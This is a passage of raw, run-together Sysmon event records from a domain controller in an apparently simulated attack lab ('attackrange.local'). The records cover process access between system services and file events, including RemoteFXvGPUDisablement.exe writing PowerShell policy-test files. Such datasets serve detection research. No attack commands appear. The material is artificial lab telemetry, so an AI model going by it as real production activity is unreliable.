12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1501-00000000AE01}6264C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-1000-00000000AE01}11241268C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.840{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.450{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6BA04DBC9D9FAAEDCC92251CEED5F99,SHA256=A2413F9A8E1E74371C6FFDD4F8A4A35CB153F7A07115F31FFB18C5DA4406421E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.185{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEF3A0EF49C838CD971E43DF14B28DD2,SHA256=07E7E79FB130B3F9B184C41CD94C2AB205EDF6E23B26CAB177BF9428F0DC580E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.854{266CAFBE-6521-6064-1601-00000000AE01}7048ATTACKRANGE\AdministratorC:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_w14cv5mb.y2v.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.854{266CAFBE-6521-6064-1601-00000000AE01}7048ATTACKRANGE\AdministratorC:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jckgrbfc.fqd.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000008942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.823{266CAFBE-6521-6064-1601-00000000AE01}7048C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jckgrbfc.fqd.ps12021-03-31 12:03:46.823 10341000x80000000000000008941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.620{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.620{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.589{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\TMPEC69.tmpMD5=062256C5466024FDB2539E33454451BD,SHA256=FE80A2AC0793D186C8C8CC213131C2751493F6C3EDE18D5DAE70F03460ED7D01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.511{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6522-6064-1C01-00000000AE01}2632C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.511{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6522-6064-1C01-00000000AE01}2632C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e0a4|c:\windows\system32\UBPM.dll+11662|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.511{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.511{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.277{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2eb40.TMPMD5=454CB557E018AE1392603B8CE43044D4,SHA256=12954C6F022AEC3AF4773BD53C76D03BF38C7F3789FE67561715CDF757F2C838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.230{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D75319EE00D9F5EA7BC5CCB6DE952E6,SHA256=B2AA6F08F2E9952F4AB76BF69046884F724574558A74585EAF8F5ADCF728B3D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.215{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml~RF2eb02.TMPMD5=D529AA2088A8961F814C32A2EDBCF52F,SHA256=03D19DA60915CB805D761B0DD7B811EE0423656F53242D6B03D6F29A71C52980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.168{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0B3B252A4E8C14092EB02E7E6D4B797,SHA256=939DC15EEF0DD1E9FE1C52B4CA32CFB9A75CF99EA32CF4A0A4DD3DFAA400BBBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.152{266CAFBE-646C-6064-1000-00000000AE01}1124NT 